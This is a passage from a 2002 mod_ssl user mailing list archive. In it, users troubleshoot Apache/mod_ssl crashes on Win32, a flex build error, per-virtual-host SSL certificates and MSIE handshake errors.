write-up explaining how to put together a debug build? > > Thanks. > > Jay > > -----Original Message----- > From: Enrico Demarin [mailto:enricod@videotron.ca] > Sent: Thursday, January 17, 2002 12:19 PM > To: modssl-users@modssl.org > Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) > > I know it's not supported but... seems like something is still not good in > mod_ssl , as reported by Josef Goebel, > who posted a patch, there is something odd in mod_ssl for win32. I applied > his patch to ap_ctx.c , that cures > the crash in most of the cases > in ap_ctx_get() adds: > if ((ctx==NULL) || (key==NULL)) > { > ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", > __FILE__, __LINE__); > return NULL; > } > and i also added the same check in ap_ctx_set. The problem is that > sometimes mod_ssl calls such functions with ctx set to null and key set to > null, and crashes apache. I have had other crashes which i haven't been > able to debug ( how do i properly build a debug version of apache-ssl on > win32 ? when the visual c debug window pops up after a crash all i can see > is assembly code ). As reported by Josef the "null" calls seem to be > generated by ssl_io_suck_read() in ssl_engine_io.c, > but why does it happen ? is there some memory corruption going inside > mod_ssl that causes the structures to be set to null ? Apache with > aforementioned patch is "almost" stable but... i have the sensation that > there is a problem somewhere else. > - Enrico > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 20:33:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA28305; Thu, 17 Jan 2002 20:32:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id UAA28271; Thu, 17 Jan 2002 20:31:23 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id B7E05BD2B; Thu, 17 Jan 2002 20:31:17 +0100 (CET) Date: Thu, 17 Jan 2002 20:31:17 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: mod_ssl-X.X.X-2.0.YY-tar.gz? Message-ID: <20020117193117.GA3624@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <3C471048.44ECC7B8@dif.um.es> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <3C471048.44ECC7B8@dif.um.es> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Jan 17, 2002 at 06:56:24PM +0100, Gabriel Lopez Millán wrote: > > When? > There will be no mod_ssl patch for apache 2.0. Ralf donated the mod_ssl code to Apache and it has been included in the Apache 2.0 distribution. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 20:37:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA28462; Thu, 17 Jan 2002 20:36:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA28449; Thu, 17 Jan 2002 20:36:02 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1000) id 6E5BD4CE69A; Thu, 17 Jan 2002 20:36:02 +0100 (CET) Date: Thu, 17 Jan 2002 20:36:02 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: mod_ssl-X.X.X-2.0.YY-tar.gz? Message-ID: <20020117203602.A50357@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.23i Organization: Engelschall, Germany. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In article <3C471048.44ECC7B8@dif.um.es> you wrote: > When? Apache 2.0.X already ships with mod_ssl, because we already ported mod_ssl to Apache 2 a few months ago and gifted the source code to the ASF. This way you no longer need an SSL/TLS add-on module for Apache 2. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 23:29:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA06479; Thu, 17 Jan 2002 23:28:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from copper.caltel.com id XAA06465; Thu, 17 Jan 2002 23:27:52 +0100 (MET) From: nirvana@got.net Received: from lbn ([12.36.116.225]) by copper.caltel.com (Post.Office MTA v3.1.2 release (PO203-101c) ID# 0-68643U3500L350S0V35) with ESMTP id AAA20638 for ; Thu, 17 Jan 2002 14:27:40 -0800 Message-Id: <4.2.2.20020117142346.00ad9f00@mail.got.net> X-Sender: lbaschy@mail.got.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 17 Jan 2002 14:43:00 -0800 To: modssl-users@modssl.org Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) In-Reply-To: <5.1.0.14.0.20020117092540.00a48390@digexch1> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: nirvana@got.net X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Don't have heavy load yet myself, but afraid I will have same problem on one machine. Here is my thinking from experience with other code: Heavy load and Win32 indicates the problem has to do with concurrency by threading. Reasoning: Easy load doesn't cause much concurrency. And under Linux, as far as I am reading in documentation, most installations run with a separate process for each connection. So what is unique to heavy load under Win32 is concurrency by threading instead of by processes. Hope that reminder saves someone time in figuring this out. Maybe I'll get to it later. Also would be interested in hints about how to debug modules under Win32. - Leo At 09:30 AM 1/17/02 -0600, you wrote: >I could have written your email word for word! I've been trying to keep Apache/mod_ssl running on WIN32 since early December, and still haven't figured out what's wrong. Josef's patch seemed to work for him, but even after applying it, my SSL-enabled Apache only runs a few minutes under heavy load before crashing. > >As far as getting a debug version built, I've had lots of trouble with that as well. It seems to build just fine in debug mode in Visual C++, but when I attempt to debug the EXE after a crash, I get no source code to trace. > >Is there anyone out there successfully running an SSL-enabled version of Apache on WIN32? If so, did you have to do anything special? And either way, does someone have a write-up explaining how to put together a debug build? > >Thanks. > >Jay > >-----Original Message----- >From: Enrico Demarin [mailto:enricod@videotron.ca] >Sent: Thursday, January 17, 2002 12:19 PM >To: modssl-users@modssl.org >Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) > >I know it's not supported but... seems like something is still not good in mod_ssl , as reported by Josef Goebel, >who posted a patch, there is something odd in mod_ssl for win32. I applied his patch to ap_ctx.c , that cures >the crash in most of the cases >in ap_ctx_get() adds: >if ((ctx==NULL) || (key==NULL)) >{ >ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", >__FILE__, __LINE__); >return NULL; >} >and i also added the same check in ap_ctx_set. The problem is that sometimes mod_ssl calls such functions with ctx set to null and key set to null, and crashes apache. I have had other crashes which i haven't been able to debug ( how do i properly build a debug version of apache-ssl on win32 ? when the visual c debug window pops up after a crash all i can see is assembly code ). As reported by Josef the "null" calls seem to be generated by ssl_io_suck_read() in ssl_engine_io.c, >but why does it happen ? is there some memory corruption going inside mod_ssl that causes the structures to be set to null ? Apache with aforementioned patch is "almost" stable but... i have the sensation that there is a problem somewhere else. >- Enrico > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 17 23:45:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA07153; Thu, 17 Jan 2002 23:44:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from copper.caltel.com id XAA07046; Thu, 17 Jan 2002 23:43:22 +0100 (MET) From: nirvana@got.net Received: from lbn ([12.36.116.225]) by copper.caltel.com (Post.Office MTA v3.1.2 release (PO203-101c) ID# 0-68643U3500L350S0V35) with ESMTP id AAA22340 for ; Thu, 17 Jan 2002 14:43:17 -0800 Message-Id: <4.2.2.20020117144521.00acbca0@mail.got.net> X-Sender: lbaschy@mail.got.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 17 Jan 2002 14:59:53 -0800 To: modssl-users@modssl.org Subject: Re: mod_ssl-X.X.X-2.0.YY-tar.gz? In-Reply-To: <20020117203602.A50357@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: nirvana@got.net X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Have problem building that under Windows. Using cygwin. Using the Visual C++ dsw/dsp projects. Rest of Apache 2.0.28 builds fine. Have put in openssl etc. (Previously on same machine have successfully built 1.3.20 with mod_ssl, still do.) The problem is specific to lex, specifically flex, processing lex.ssl_expr_yy.c(1753) : error C2143: syntax error : missing ')' before 'constant' Essentially that means there is a file ssl_expr_scan.l which is being used to generate ssl_expr_scan.c and that generation doesn't work right. The .c file fails to compile. A temporary workaround seems to be to skip lex/flex use the ssl_expr_scan.c file that comes with 2.0.28, but I have no idea whether that might actually be an (older) incorrect version then. Any insights? (I'm working with 1.3.20 meanwhile, just to get things done for a demo to keep this project alive, and because not sure how well mod_ssl works yet in 2.0.28. I'd be willing to spend some time on this. Just seems like another good size piece of source to learn...) At 08:36 PM 1/17/02 +0100, you wrote: >In article <3C471048.44ECC7B8@dif.um.es> you wrote: > > > When? > >Apache 2.0.X already ships with mod_ssl, because we already ported mod_ssl to >Apache 2 a few months ago and gifted the source code to the ASF. This way >you no longer need an SSL/TLS add-on module for Apache 2. > > Ralf S. Engelschall > rse@engelschall.com > www.engelschall.com >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 00:17:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA10260; Fri, 18 Jan 2002 00:15:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from VL-MS-MR003.sc1.videotron.ca id AAA10140; Fri, 18 Jan 2002 00:14:07 +0100 (MET) Received: from shodan2 ([24.200.91.45]) by VL-MS-MR003.sc1.videotron.ca (Netscape Messaging Server 4.15 MR003 Jul 24 2001 16:23:26) with ESMTP id GQ3V7103.D1Q for ; Thu, 17 Jan 2002 18:13:49 -0500 From: "Enrico Demarin" To: Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) Date: Thu, 17 Jan 2002 18:13:44 -0800 Message-ID: <000901c19fc5$c1899ec0$0340a8c0@shodan2> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <4.2.2.20020117142346.00ad9f00@mail.got.net> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Enrico Demarin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Well I became aware of the problem when I started refreshing an ssl page very fast from localhost... So I guess the load doesn't have to be -that- high to reproduce the problem. I agree there must be some problem in the threading code. I tried apache 2.0 with mod_ssl but I couldn't get it to work on win32. It would be interesting if the people involved in the porting of Apache on Win32 would take the time to write a sort of "developer howto", (or if it exists already, mail the pointers to it :) explaining like you said how to debug apache modules and the apache code itself ( apache modules on win32 are .so objects while one would expect DLLs for example). In my case we will probably solve the problem by (temporarely?) switching to IIS, but it would be nice to have an alternative to it, and Apache would be the best alternative to it in my opinion. Thanks, Enrico -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of nirvana@got.net Sent: January 17, 2002 2:43 PM To: modssl-users@modssl.org Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) Don't have heavy load yet myself, but afraid I will have same problem on one machine. Here is my thinking from experience with other code: Heavy load and Win32 indicates the problem has to do with concurrency by threading. Reasoning: Easy load doesn't cause much concurrency. And under Linux, as far as I am reading in documentation, most installations run with a separate process for each connection. So what is unique to heavy load under Win32 is concurrency by threading instead of by processes. Hope that reminder saves someone time in figuring this out. Maybe I'll get to it later. Also would be interested in hints about how to debug modules under Win32. - Leo At 09:30 AM 1/17/02 -0600, you wrote: >I could have written your email word for word! I've been trying to >keep Apache/mod_ssl running on WIN32 since early December, and still >haven't figured out what's wrong. Josef's patch seemed to work for him, >but even after applying it, my SSL-enabled Apache only runs a few >minutes under heavy load before crashing. > >As far as getting a debug version built, I've had lots of trouble with >that as well. It seems to build just fine in debug mode in Visual C++, >but when I attempt to debug the EXE after a crash, I get no source code >to trace. > >Is there anyone out there successfully running an SSL-enabled version >of Apache on WIN32? If so, did you have to do anything special? And >either way, does someone have a write-up explaining how to put together >a debug build? > >Thanks. > >Jay > >-----Original Message----- >From: Enrico Demarin [mailto:enricod@videotron.ca] >Sent: Thursday, January 17, 2002 12:19 PM >To: modssl-users@modssl.org >Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) > >I know it's not supported but... seems like something is still not good >in mod_ssl , as reported by Josef Goebel, who posted a patch, there is >something odd in mod_ssl for win32. I applied his patch to ap_ctx.c , >that cures the crash in most of the cases in ap_ctx_get() adds: if >((ctx==NULL) || (key==NULL)) { >ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", >__FILE__, __LINE__); >return NULL; >} >and i also added the same check in ap_ctx_set. The problem is that sometimes mod_ssl calls such functions with ctx set to null and key set to null, and crashes apache. I have had other crashes which i haven't been able to debug ( how do i properly build a debug version of apache-ssl on win32 ? when the visual c debug window pops up after a crash all i can see is assembly code ). As reported by Josef the "null" calls seem to be generated by ssl_io_suck_read() in ssl_engine_io.c, >but why does it happen ? is there some memory corruption going inside mod_ssl that causes the structures to be set to null ? Apache with aforementioned patch is "almost" stable but... i have the sensation that there is a problem somewhere else. >- Enrico > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 00:42:42 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA14349; Fri, 18 Jan 2002 00:42:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from datgwy02.skf.se id AAA14183; Fri, 18 Jan 2002 00:40:36 +0100 (MET) Received: from skf.se (dns02.skf.net [163.157.8.12]) by datgwy02.skf.se (8.9.3/8.9.1) with ESMTP id AAA19160 for ; Fri, 18 Jan 2002 00:34:37 +0100 (MET) Received: from IDSSPATRICK by skf.se (8.8.8+Sun/SMI-SVR4) id AAA28881; Fri, 18 Jan 2002 00:48:01 +0100 (MET) Message-ID: <002d01c19fb0$5131e750$70b89da3@kop.skf.se> From: "Patrick Willart" To: References: <000901c19fc5$c1899ec0$0340a8c0@shodan2> Subject: Re: mod-ssl on win32 (mod_ssl bug 569, apache crash) Date: Thu, 17 Jan 2002 15:40:02 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Patrick Willart" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I used this very good HOWTO document by Balázs Bárány. http://tud.at/programm/apache-ssl-win32-howto.php3 Besides that I also had set KeepAlive to Off to work around a multithreading problem. Another tip is to compile OpenSSL with ms\do_ms instead of ms\do_masm. The masm compilation generated code that worked fine on my development machine but not on my production server due to code optimization. Hope this helps, Patrick ----- Original Message ----- From: "Enrico Demarin" To: Sent: Thursday, January 17, 2002 6:13 PM Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) > Well I became aware of the problem when I started refreshing an ssl page > very fast from localhost... So I guess the load doesn't have to be > -that- high to reproduce the problem. I agree there must be some problem > in the threading code. I tried apache 2.0 with mod_ssl but I couldn't > get it to work on win32. It would be interesting if the people involved > in the porting of Apache on Win32 would take the time to write a sort of > "developer howto", (or if it exists already, mail the pointers to it :) > explaining like you said how to debug apache modules and the apache code > itself ( apache modules on win32 are .so objects while one would expect > DLLs for example). > > In my case we will probably solve the problem by (temporarely?) > switching to IIS, but it would be nice to have an alternative to it, and > Apache would be the best alternative to it in my opinion. > > Thanks, > Enrico > > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org] On Behalf Of nirvana@got.net > Sent: January 17, 2002 2:43 PM > To: modssl-users@modssl.org > Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) > > > Don't have heavy load yet myself, but afraid I will have same problem on > one machine. Here is my thinking from experience with other code: > > Heavy load and Win32 indicates the problem has to do with concurrency by > threading. > > Reasoning: Easy load doesn't cause much concurrency. And under Linux, > as far as I am reading in documentation, most installations run with a > separate process for each connection. So what is unique to heavy load > under Win32 is concurrency by threading instead of by processes. > > Hope that reminder saves someone time in figuring this out. Maybe I'll > get to it later. Also would be interested in hints about how to debug > modules under Win32. > > - Leo > > At 09:30 AM 1/17/02 -0600, you wrote: > >I could have written your email word for word! I've been trying to > >keep Apache/mod_ssl running on WIN32 since early December, and still > >haven't figured out what's wrong. Josef's patch seemed to work for him, > > >but even after applying it, my SSL-enabled Apache only runs a few > >minutes under heavy load before crashing. > > > >As far as getting a debug version built, I've had lots of trouble with > >that as well. It seems to build just fine in debug mode in Visual C++, > > >but when I attempt to debug the EXE after a crash, I get no source code > > >to trace. > > > >Is there anyone out there successfully running an SSL-enabled version > >of Apache on WIN32? If so, did you have to do anything special? And > >either way, does someone have a write-up explaining how to put together > > >a debug build? > > > >Thanks. > > > >Jay > > > >-----Original Message----- > >From: Enrico Demarin [mailto:enricod@videotron.ca] > >Sent: Thursday, January 17, 2002 12:19 PM > >To: modssl-users@modssl.org > >Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) > > > >I know it's not supported but... seems like something is still not good > > >in mod_ssl , as reported by Josef Goebel, who posted a patch, there is > >something odd in mod_ssl for win32. I applied his patch to ap_ctx.c , > >that cures the crash in most of the cases in ap_ctx_get() adds: if > >((ctx==NULL) || (key==NULL)) { > >ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", > >__FILE__, __LINE__); > >return NULL; > >} > >and i also added the same check in ap_ctx_set. The problem is that > sometimes mod_ssl calls such functions with ctx set to null and key set > to null, and crashes apache. I have had other crashes which i haven't > been able to debug ( how do i properly build a debug version of > apache-ssl on win32 ? when the visual c debug window pops up after a > crash all i can see is assembly code ). As reported by Josef the "null" > calls seem to be generated by ssl_io_suck_read() in ssl_engine_io.c, > >but why does it happen ? is there some memory corruption going inside > mod_ssl that causes the structures to be set to null ? Apache with > aforementioned patch is "almost" stable but... i have the sensation that > there is a problem somewhere else. > >- Enrico > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 00:51:31 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA15283; Fri, 18 Jan 2002 00:49:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from copper.caltel.com id AAA15106; Fri, 18 Jan 2002 00:48:08 +0100 (MET) Received: from lbn ([12.36.116.225]) by copper.caltel.com (Post.Office MTA v3.1.2 release (PO203-101c) ID# 0-68643U3500L350S0V35) with ESMTP id AAA5238 for ; Thu, 17 Jan 2002 15:48:00 -0800 Message-Id: <4.2.2.20020117155858.00ad2b10@mail.got.net> X-Sender: lbaschy@mail.got.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 17 Jan 2002 16:04:35 -0800 To: modssl-users@modssl.org From: Leo Baschy Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) In-Reply-To: <000901c19fc5$c1899ec0$0340a8c0@shodan2> References: <4.2.2.20020117142346.00ad9f00@mail.got.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Leo Baschy X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users If you indeed refresh then that would be on the same connection and threading would not be involved if it is a page by itself in one file (i.e. without images, without frames). Important detail: Are you refreshing a single resource (file)? If not, then please test that simplified case. Knowing that helps pinpoint the problem. Is there different behavior if you allow keeping alive connection or forcing not to keep alive? (Do that from the configuration file.) Do you known whether it keeps alive? (There must be some way to log that, maybe you have to recompile specifically for that, maybe there is a configuration option, I'm not sure.) - Leo At 06:13 PM 1/17/02 -0800, you wrote: >Well I became aware of the problem when I started refreshing an ssl page >very fast from localhost... So I guess the load doesn't have to be >-that- high to reproduce the problem. I agree there must be some problem >in the threading code. I tried apache 2.0 with mod_ssl but I couldn't >get it to work on win32. It would be interesting if the people involved >in the porting of Apache on Win32 would take the time to write a sort of >"developer howto", (or if it exists already, mail the pointers to it :) >explaining like you said how to debug apache modules and the apache code >itself ( apache modules on win32 are .so objects while one would expect >DLLs for example). > >In my case we will probably solve the problem by (temporarely?) >switching to IIS, but it would be nice to have an alternative to it, and >Apache would be the best alternative to it in my opinion. > >Thanks, >Enrico > >-----Original Message----- >From: owner-modssl-users@modssl.org >[mailto:owner-modssl-users@modssl.org] On Behalf Of nirvana@got.net >Sent: January 17, 2002 2:43 PM >To: modssl-users@modssl.org >Subject: RE: mod-ssl on win32 (mod_ssl bug 569, apache crash) > > >Don't have heavy load yet myself, but afraid I will have same problem on >one machine. Here is my thinking from experience with other code: > >Heavy load and Win32 indicates the problem has to do with concurrency by >threading. > >Reasoning: Easy load doesn't cause much concurrency. And under Linux, >as far as I am reading in documentation, most installations run with a >separate process for each connection. So what is unique to heavy load >under Win32 is concurrency by threading instead of by processes. > >Hope that reminder saves someone time in figuring this out. Maybe I'll >get to it later. Also would be interested in hints about how to debug >modules under Win32. > >- Leo > >At 09:30 AM 1/17/02 -0600, you wrote: > >I could have written your email word for word! I've been trying to > >keep Apache/mod_ssl running on WIN32 since early December, and still > >haven't figured out what's wrong. Josef's patch seemed to work for him, > > >but even after applying it, my SSL-enabled Apache only runs a few > >minutes under heavy load before crashing. > > > >As far as getting a debug version built, I've had lots of trouble with > >that as well. It seems to build just fine in debug mode in Visual C++, > > >but when I attempt to debug the EXE after a crash, I get no source code > > >to trace. > > > >Is there anyone out there successfully running an SSL-enabled version > >of Apache on WIN32? If so, did you have to do anything special? And > >either way, does someone have a write-up explaining how to put together > > >a debug build? > > > >Thanks. > > > >Jay > > > >-----Original Message----- > >From: Enrico Demarin [mailto:enricod@videotron.ca] > >Sent: Thursday, January 17, 2002 12:19 PM > >To: modssl-users@modssl.org > >Subject: mod-ssl on win32 (mod_ssl bug 569, apache crash) > > > >I know it's not supported but... seems like something is still not good > > >in mod_ssl , as reported by Josef Goebel, who posted a patch, there is > >something odd in mod_ssl for win32. I applied his patch to ap_ctx.c , > >that cures the crash in most of the cases in ap_ctx_get() adds: if > >((ctx==NULL) || (key==NULL)) { > >ap_log_assert("ap_ctx_get_bug: ctx or key are NULL!", > >__FILE__, __LINE__); > >return NULL; > >} > >and i also added the same check in ap_ctx_set. The problem is that >sometimes mod_ssl calls such functions with ctx set to null and key set >to null, and crashes apache. I have had other crashes which i haven't >been able to debug ( how do i properly build a debug version of >apache-ssl on win32 ? when the visual c debug window pops up after a >crash all i can see is assembly code ). As reported by Josef the "null" >calls seem to be generated by ssl_io_suck_read() in ssl_engine_io.c, > >but why does it happen ? is there some memory corruption going inside >mod_ssl that causes the structures to be set to null ? Apache with >aforementioned patch is "almost" stable but... i have the sensation that >there is a problem somewhere else. > >- Enrico > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 02:42:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA24199; Fri, 18 Jan 2002 02:41:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from rush.insidecrew.net id CAA24178; Fri, 18 Jan 2002 02:40:50 +0100 (MET) Received: from localhost (joe@localhost) by rush.insidecrew.net (8.11.2/8.11.0) with ESMTP id g0I1hXD02717 for ; Thu, 17 Jan 2002 20:43:33 -0500 Date: Thu, 17 Jan 2002 20:43:33 -0500 (EST) From: Joe Auty X-X-Sender: To: Subject: Multiple SSL-enabled vhosts Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Auty X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Thanks to all those that helped me with my original problem and being patient with my dependence on this list. I think I'm starting to 'get it'. I just have (hopefully) one more question before I leave you guys alone.... =) I want to have 2 different certificates used in 2 different virtual hosts on my server. I have: "SSLCertificateFile /etc/httpd/conf/ssl.crt/cert1.crt" specified for one virtualhost, and: "SSLCertificateFile /etc/httpd/conf/ssl.crt/cert2.crt" specified for the other. The problem is that other/second vhost is using cert1.crt for some reason. When I do a "openssl x509 -noout -text -in cert2.crt" I get the correct information for that certificate which is, of course, different than cert1. Is there a way to specify multiple SSLCertificateFile directives for different vhosts, or will the first one specified be used unconditionally for all other vhosts? Thanks in advance for your response and help... (I promise I won't CC anybody who responds to me... I did this in case the individuals I were responding to had filters for regular listmail) =) -- Joe Auty joe@netmusician.org http://www.netmusician.org http://www.jeahost.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 07:15:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA06351; Fri, 18 Jan 2002 07:14:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from vwxyz.com id HAA06337; Fri, 18 Jan 2002 07:13:41 +0100 (MET) Message-Id: <4.3.2.7.2.20020117203440.033d3c00@130.94.22.245> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 17 Jan 2002 22:10:04 -0800 To: modssl-users@modssl.org From: Christopher Taranto Subject: RE: MSIE + "The page cannot be displayed" error Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christopher Taranto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have been trying to fix the known MSIE browser issues in my configuration with some issues still occuring. I have read the FAQ, searched the archives, and implemented the solutions that have been documented - but I am still getting the dreaded "The page cannot be displayed" error when certain MSIE browsers attempt to connect to my site. I get the infamous log entry: [Fri Jan 18 00:55:53 2002] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows) [Fri Jan 18 00:55:53 2002] [error] System: Connection reset by peer (errno: 104) Fortunately (for my sanity), I have one of non-working versions of the MSIE browsers (5.00.2614.3500) 